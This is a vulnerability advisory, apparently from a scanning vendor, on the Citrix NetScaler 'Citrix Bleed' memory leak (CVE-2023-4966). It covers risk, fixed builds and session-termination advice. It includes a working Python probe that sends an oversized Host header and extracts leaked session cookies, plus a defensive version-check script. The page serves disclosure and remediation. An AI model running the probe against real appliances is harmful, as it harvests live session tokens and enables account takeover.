
Citrix NetScaler - Memory Leak CVE-2023-4966

Severity
CVSSv3 Score
9.4
Vulnerability description

Citrix NetScaler ADC and NetScaler Gateway are vulnerable to CVE-2023-4966, a sensitive information disclosure vulnerability (a buffer over-read) in the /oauth/idp/.well-known/openid-configuration endpoint. The appliance is affected only when it is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server. The root cause is a missing length check on the user-supplied Host header: an oversized Host header value makes the server reply with more bytes than its response buffer actually holds, so the reply continues into adjacent process memory. That memory can contain valid session cookies of currently authenticated users. An unauthenticated remote attacker can therefore read session tokens out of the response and replay them to hijack those sessions, bypassing both the password and any multi-factor authentication.
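The check described above, as an added example (not Pentest-Tools' Sniper module and not Citrix code): it builds the probe request with an oversized Host header and analyses the reply, treating anything after the first complete JSON document as leaked memory and pulling candidate session cookies out of it. The Host header length (24812 bytes) and the NSC_AAAC cookie name are assumptions taken from public analysis of the bug, not from this page; the sample response bodies are constructed.

```python
"""Probe builder and response analyser for CVE-2023-4966 (Citrix Bleed).

Added example for this page; not Pentest-Tools' Sniper module nor Citrix code.
Assumptions not stated on the page: the Host length of 24812 bytes and the
NSC_AAAC cookie name come from public analysis of the bug, and the response
checks below are this example's own heuristics.
"""
import json
import re
import socket
import ssl

PROBE_PATH = "/oauth/idp/.well-known/openid-configuration"
HOST_LEN = 24812  # assumption: oversized Host length used in public write-ups


def build_probe_request(host_len: int = HOST_LEN) -> bytes:
    """Raw HTTP/1.1 request whose Host header value is host_len bytes long."""
    return (
        f"GET {PROBE_PATH} HTTP/1.1\r\n"
        f"Host: {'a' * host_len}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def split_body(body: bytes) -> tuple[dict, bytes]:
    """Return (openid document, trailing bytes).

    A patched appliance answers with the JSON document and nothing else. On a
    vulnerable one the reply keeps going past the closing brace with whatever
    followed the response buffer in memory, so every byte after the first
    complete JSON value is leaked data. Assumes a non-chunked body.
    """
    text = body.decode("latin-1")  # 1:1 byte mapping, never raises
    doc, end = json.JSONDecoder().raw_decode(text)
    return doc, body[end:]


COOKIE = re.compile(rb"NSC_AAAC=([^;\s\x00]+)")   # AAA session cookie (assumed name)
PRINTABLE = re.compile(rb"[\x20-\x7e]{32,}")      # strings(1)-style printable runs


def analyse(body: bytes) -> dict:
    """Summarise the leak evidence found in a probe response body."""
    doc, leaked = split_body(body)
    return {
        "issuer": doc.get("issuer"),
        "leaked_bytes": len(leaked),
        "leaking": len(leaked) > 0,
        "session_cookies": [m.decode("latin-1") for m in COOKIE.findall(leaked)],
        "printable_strings": [m.decode("latin-1") for m in PRINTABLE.findall(leaked)],
    }


def probe(host: str, port: int = 443, timeout: float = 10.0) -> dict:
    """Send the probe over TLS and analyse the body. Certificate checks are
    disabled on purpose: appliances frequently carry self-signed certificates."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(build_probe_request())
            chunks = []
            while chunk := tls.recv(65536):
                chunks.append(chunk)
    _head, _, body = b"".join(chunks).partition(b"\r\n\r\n")
    return analyse(body)


# Constructed sample bodies (not captured from a real appliance).
CLEAN_BODY = json.dumps({"issuer": "https://vpn.example.test",
                         "response_types_supported": ["code"]}).encode()
LEAKY_BODY = (CLEAN_BODY + b"\x00" * 16
              + b"Cookie: NSC_AAAC=" + b"c" * 64 + b";\x00\x7f")

if __name__ == "__main__":
    print(analyse(CLEAN_BODY))   # leaking: False
    print(analyse(LEAKY_BODY))   # leaking: True, one candidate cookie
```

Run `probe("gateway.example.test")` against a host you are authorised to test; a `leaked_bytes` value of zero on a reachable Gateway or AAA virtual server is the expected result after patching. Anything non-zero should be treated as leaked memory and the extracted cookies as live credentials to be revoked.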

Risk description

An unauthenticated remote attacker who can reach the Gateway or AAA virtual server can harvest valid session tokens from the leaked memory and replay them to take over existing authenticated sessions without knowing a password or passing MFA. The attacker then has the same access the legitimate user has through the appliance (VPN, published applications and any internal resources behind it), which is a direct foothold for pivoting into the internal network, escalating privileges and exfiltrating confidential information. The vulnerability was exploited in the wild, including by ransomware operators, before and after the patch was released.

Exploit capabilities

Sniper can extract custom artefacts as evidence from the target system.

Recommendation

Upgrade NetScaler ADC and NetScaler Gateway to a fixed build: 14.1-8.50 or later, 13.1-49.15 or later, or 13.0-92.19 or later; NetScaler ADC 13.1-FIPS 13.1-37.164 or later; NetScaler ADC 12.1-FIPS 12.1-55.300 or later; NetScaler ADC 12.1-NDcPP 12.1-55.300 or later. The standard (non-FIPS, non-NDcPP) 12.1 release is end of life and receives no fix, so it must be upgraded to a supported release. Patching alone does not protect against sessions whose tokens were already leaked: after upgrading, terminate all active and persistent sessions on the appliance (Citrix's guidance lists the NetScaler CLI commands for killing ICA, RDP, PCoIP and AAA sessions and clearing load-balancer persistent sessions) and review the appliance and the accounts behind it for signs of earlier session hijacking.
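An added helper (not Pentest-Tools or Citrix code) that decides whether a NetScaler version banner is at or above the fixed build listed above. It accepts the form printed by `show version` (assumed to look like `NetScaler NS13.1: Build 49.15.nc`) and the short `13.1-49.15` form used in Citrix's advisory. The edition must be supplied by the operator: the banner alone does not distinguish 13.1 from 13.1-FIPS, and the two have different fixed builds, so comparing a FIPS appliance against the standard table gives the wrong answer. The version strings in the sample run are constructed.

```python
"""Fixed-version check for CVE-2023-4966 from a NetScaler version banner.

Added example for this page (not Pentest-Tools or Citrix code). The fixed
builds are the ones in the recommendation above; the banner format
'NetScaler NS13.1: Build 49.15.nc' is assumed to match 'show version'.
"""
import re

# Lowest fixed build per (edition, release). Standard 12.1 is absent on
# purpose: it is end of life and has no fixed build.
FIXED = {
    ("standard", "14.1"): (8, 50),
    ("standard", "13.1"): (49, 15),
    ("standard", "13.0"): (92, 19),
    ("fips", "13.1"): (37, 164),
    ("fips", "12.1"): (55, 300),
    ("ndcpp", "12.1"): (55, 300),
}

# Matches 'NS13.1: Build 49.15.nc' and the advisory form '13.1-49.15'.
BANNER = re.compile(r"(?:NS)?(\d+\.\d+)[:\-]\s*(?:Build\s+)?(\d+)\.(\d+)")


def parse_version(banner: str) -> tuple[str, tuple[int, int]]:
    """'NetScaler NS13.1: Build 49.15.nc' -> ('13.1', (49, 15))."""
    m = BANNER.search(banner)
    if not m:
        raise ValueError(f"unrecognised version banner: {banner!r}")
    return m.group(1), (int(m.group(2)), int(m.group(3)))


def status(banner: str, edition: str = "standard") -> str:
    """'fixed', 'vulnerable', or 'unsupported' (release with no fixed build)."""
    release, build = parse_version(banner)
    floor = FIXED.get((edition.lower(), release))
    if floor is None:
        return "unsupported"
    # Build numbers compare as (build, patch) tuples, not as floats:
    # 49.15 is newer than 49.9, which a float comparison would get wrong.
    return "fixed" if build >= floor else "vulnerable"


if __name__ == "__main__":
    # Constructed sample banners.
    for banner, edition in [
        ("NetScaler NS13.1: Build 49.15.nc", "standard"),
        ("NetScaler NS13.1: Build 48.47.nc", "standard"),
        ("13.1-37.164", "standard"),   # wrong table for a FIPS box: 'vulnerable'
        ("13.1-37.164", "fips"),       # right table: 'fixed'
        ("12.1-55.300", "standard"),   # EOL release: 'unsupported'
        ("12.1-55.300", "ndcpp"),
    ]:
        print(f"{banner:36} {edition:9} {status(banner, edition)}")
```

Feed it the banner from `show version` on the appliance (or the version reported by a scanner) together with the edition from the licence or the firmware file name; a result of `unsupported` means the release has no fix and the appliance needs a release upgrade rather than a build update.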

Codename
Citrix Bleed
Detectable with
Network Scanner
Scan engine
Sniper
Exploitable with Sniper
Yes
CVE Published
Oct 10, 2023
Software Type
Network Management
Vendor
Citrix
Product
Citrix NetScaler